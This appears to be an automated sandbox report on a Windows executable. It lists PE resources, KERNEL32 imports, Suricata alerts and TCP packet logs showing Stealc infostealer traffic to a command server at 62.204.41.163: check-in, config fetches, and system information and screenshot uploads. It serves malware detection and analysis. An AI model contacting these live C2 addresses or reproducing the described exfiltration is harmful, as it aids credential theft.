RT_STRING	0x27a3450	0x598	data			0.4483240223463687
RT_STRING	0x27a39e8	0x680	data			0.4387019230769231
RT_STRING	0x27a4068	0x5ea	data			0.43593130779392336
RT_STRING	0x27a4658	0x7f0	data			0.4237204724409449
RT_STRING	0x27a4e48	0x69c	data			0.43498817966903075
RT_STRING	0x27a54e8	0x6f0	data			0.42849099099099097
RT_STRING	0x27a5bd8	0x5e6	data			0.44437086092715233
RT_STRING	0x27a61c0	0x7ec	data			0.4176528599605523
RT_STRING	0x27a69b0	0x60c	data			0.43733850129198965
RT_STRING	0x27a6fc0	0x680	data			0.43209134615384615
RT_STRING	0x27a7640	0x64c	data			0.4280397022332506
RT_ACCELERATOR	0x27a21d8	0x28	data			1.025
RT_GROUP_ICON	0x279cef8	0x68	data	Turkish	Turkey	0.7115384615384616
RT_GROUP_ICON	0x27a1178	0x68	data	Turkish	Turkey	0.7115384615384616
RT_VERSION	0x27a2210	0x1a4	data			0.5738095238095238
None	0x27a2200	0xa	data			1.8

Imports

DLL

Import

KERNEL32.dll

DebugActiveProcess, SetProcessAffinityMask, SetDefaultCommConfigA, GetNumaProcessorNode, GetLocaleInfoA, CallNamedPipeA, UpdateResourceA, MoveFileExW, GetConsoleAliasA, GlobalSize, GetEnvironmentStringsW, Process32First, GlobalLock, FreeEnvironmentStringsA, GetModuleHandleW, GetTickCount, FormatMessageA, GetSystemWow64DirectoryW, GetConsoleAliasExesLengthW, GetStringTypeExW, HeapDestroy, GetTimeFormatW, SetConsoleCursorPosition, GetModuleFileNameW, GetConsoleFontSize, GetACP, GetStartupInfoA, GetStdHandle, GetLogicalDriveStringsA, GetProcAddress, MoveFileW, VirtualAllocEx, BuildCommDCBW, SetFileApisToOEM, LoadLibraryA, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, BeginUpdateResourceA, SetCommMask, SetNamedPipeHandleState, GetModuleHandleA, OpenFileMappingW, PurgeComm, GetVersionExA, ReadConsoleOutputCharacterW, SetFileAttributesW, LocalFileTimeToFileTime, GetLastError, HeapReAlloc, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, ExitProcess, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapCreate, VirtualFree, HeapFree, VirtualAlloc, WriteFile, GetModuleFileNameA, FreeEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, CreateFileA, CloseHandle, FlushFileBuffers

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-02T17:56:21.148853+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.7	49700	62.204.41.163	80	TCP
2024-11-02T17:56:21.415757+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.7	49700	62.204.41.163	80	TCP
2024-11-02T17:56:21.422018+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	62.204.41.163	80	192.168.2.7	49700	TCP
2024-11-02T17:56:21.682169+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.7	49700	62.204.41.163	80	TCP
2024-11-02T17:56:21.689213+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	62.204.41.163	80	192.168.2.7	49700	TCP
2024-11-02T17:56:22.651233+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.7	49700	62.204.41.163	80	TCP
2024-11-02T17:56:23.401633+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49700	62.204.41.163	80	TCP
2024-11-02T17:56:33.132071+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.7	49737	TCP
2024-11-02T17:56:54.247617+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49933	62.204.41.163	80	TCP
2024-11-02T17:56:56.576040+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49933	62.204.41.163	80	TCP
2024-11-02T17:56:58.173981+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49933	62.204.41.163	80	TCP
2024-11-02T17:57:00.005860+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49933	62.204.41.163	80	TCP
2024-11-02T17:57:02.785945+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49933	62.204.41.163	80	TCP
2024-11-02T17:57:03.677736+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49933	62.204.41.163	80	TCP
2024-11-02T17:57:05.317896+0100	2044249	ET MALWARE Win32/Stealc Submitting Screenshot to C2	1	192.168.2.7	49933	62.204.41.163	80	TCP
2024-11-02T17:57:07.136758+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	50055	176.113.115.215	80	TCP
2024-11-02T17:57:16.682574+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.7	50098	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 2, 2024 17:56:08.776393890 CET	443	49698	104.98.116.138	192.168.2.7
Nov 2, 2024 17:56:08.776556015 CET	49698	443	192.168.2.7	104.98.116.138
Nov 2, 2024 17:56:09.437515020 CET	49674	443	192.168.2.7	104.98.116.138
Nov 2, 2024 17:56:09.438853979 CET	49675	443	192.168.2.7	104.98.116.138
Nov 2, 2024 17:56:09.624947071 CET	49672	443	192.168.2.7	104.98.116.138
Nov 2, 2024 17:56:10.204598904 CET	49677	443	192.168.2.7	20.50.201.200
Nov 2, 2024 17:56:10.578020096 CET	49677	443	192.168.2.7	20.50.201.200
Nov 2, 2024 17:56:11.328052998 CET	49677	443	192.168.2.7	20.50.201.200
Nov 2, 2024 17:56:12.828039885 CET	49677	443	192.168.2.7	20.50.201.200
Nov 2, 2024 17:56:15.812550068 CET	49677	443	192.168.2.7	20.50.201.200
Nov 2, 2024 17:56:19.062396049 CET	49674	443	192.168.2.7	104.98.116.138
Nov 2, 2024 17:56:19.062417030 CET	49675	443	192.168.2.7	104.98.116.138
Nov 2, 2024 17:56:19.281173944 CET	49672	443	192.168.2.7	104.98.116.138
Nov 2, 2024 17:56:19.859098911 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:19.859149933 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:19.859214067 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:19.859601974 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:19.859616995 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:19.943638086 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:19.948548079 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:19.948673010 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:19.949311018 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:19.954108000 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:20.623007059 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:20.623087883 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:20.627183914 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:20.627197981 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:20.627465010 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:20.637228012 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:20.679335117 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:20.818119049 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:20.818260908 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:20.820760965 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:20.825635910 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:20.888634920 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:20.888664961 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:20.888705969 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:20.888724089 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:20.888750076 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:20.888775110 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:20.888797998 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.010087013 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.010107040 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.010164022 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.010180950 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.010215044 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.131887913 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.131910086 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.132019997 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.132031918 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.132074118 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.148781061 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:21.148853064 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:21.150626898 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:21.155508041 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:21.254812002 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.254837036 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.254903078 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.254939079 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.254956961 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.254982948 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.376130104 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.376151085 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.376270056 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.376313925 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.376359940 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.415648937 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:21.415672064 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:21.415756941 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:21.417169094 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:21.422018051 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:21.497823000 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.497848988 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.497996092 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.498039961 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.498085976 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.619260073 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.619282961 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.619404078 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.619442940 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.619498968 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.681848049 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:21.681900978 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:21.681912899 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:21.681986094 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:21.681998968 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:21.682132959 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:21.682151079 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:21.682168961 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:21.682168961 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:21.682214022 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:21.682214022 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:21.682595968 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:21.682646036 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:21.684354067 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:21.689213037 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:21.717787027 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.717808008 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.717911959 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.717932940 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.717988014 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.765577078 CET	49677	443	192.168.2.7	20.50.201.200
Nov 2, 2024 17:56:21.785681963 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.785706043 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.785783052 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.785850048 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.785908937 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.906732082 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.906759977 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.906826019 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.906837940 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.906868935 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.906893015 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.947931051 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:21.947988987 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:21.991240978 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.991266966 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.991420031 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:21.991451979 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:21.991492033 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:22.107058048 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:22.107075930 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:22.107131958 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:22.107182980 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:22.107198000 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:22.107222080 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:22.205413103 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:22.205435038 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:22.205528021 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:22.205583096 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:22.205622911 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:22.230132103 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:22.230199099 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:22.230207920 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:22.230259895 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:22.289968014 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:22.289968014 CET	49699	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:22.290002108 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:22.290023088 CET	443	49699	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:22.362195015 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:22.362234116 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:22.367059946 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:22.367130041 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:22.367141008 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:22.367150068 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:22.367161036 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:22.367393970 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:22.367414951 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:22.651155949 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:22.651232958 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.007888079 CET	49701	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.007942915 CET	443	49701	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.008006096 CET	49701	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.009200096 CET	49702	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.009226084 CET	443	49702	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.009289980 CET	49702	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.009651899 CET	49703	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.009677887 CET	443	49703	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.009727001 CET	49703	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.010502100 CET	49701	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.010524988 CET	443	49701	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.011488914 CET	49704	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.011527061 CET	443	49704	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.011584044 CET	49704	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.011689901 CET	49704	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.011704922 CET	443	49704	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.012439966 CET	49705	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.012466908 CET	443	49705	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.012523890 CET	49705	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.012535095 CET	49702	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.012546062 CET	443	49702	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.013946056 CET	49703	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.013976097 CET	443	49703	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.016128063 CET	49705	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.016143084 CET	443	49705	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.140125990 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.145055056 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.401493073 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.401524067 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.401540041 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.401633024 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.401670933 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.401906967 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.401920080 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.401931047 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.401943922 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.401947975 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.401956081 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.401973009 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.402002096 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.402486086 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.402529955 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.402669907 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.402707100 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.403111935 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.403122902 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.403137922 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.403157949 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.403183937 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.539997101 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.540090084 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.540103912 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.540143013 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.540249109 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.540265083 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.540288925 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.540288925 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.540323973 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.540411949 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.540455103 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.540488005 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.540503025 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.540534973 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.540548086 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.540688038 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.540704012 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.540735960 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.540750980 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.541321039 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.541342974 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.541366100 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.541393995 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.657167912 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.657227039 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.657228947 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.657267094 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.657342911 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.657356024 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.657382011 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.657402992 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.657469034 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.657519102 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.657684088 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.657721996 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.657753944 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.657763958 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.657798052 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.657891035 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.657943010 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.657973051 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.657985926 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.658010006 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.658035994 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.658102036 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.658149004 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.658514977 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.658534050 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.658548117 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.658569098 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.677788019 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.677822113 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:23.677845955 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.677876949 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:23.751266003 CET	443	49701	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.751960993 CET	49701	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.752002954 CET	443	49701	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.752625942 CET	49701	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.752633095 CET	443	49701	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.757164955 CET	443	49705	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.757631063 CET	49705	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.757666111 CET	443	49705	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.758038998 CET	49705	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.758044958 CET	443	49705	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.764481068 CET	443	49704	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.764875889 CET	49704	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.764900923 CET	443	49704	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.765271902 CET	49704	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.765276909 CET	443	49704	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.771106005 CET	443	49703	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:23.771496058 CET	49703	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:23.771541119 CET	443	49703	13.107.246.45	192.168.2.7
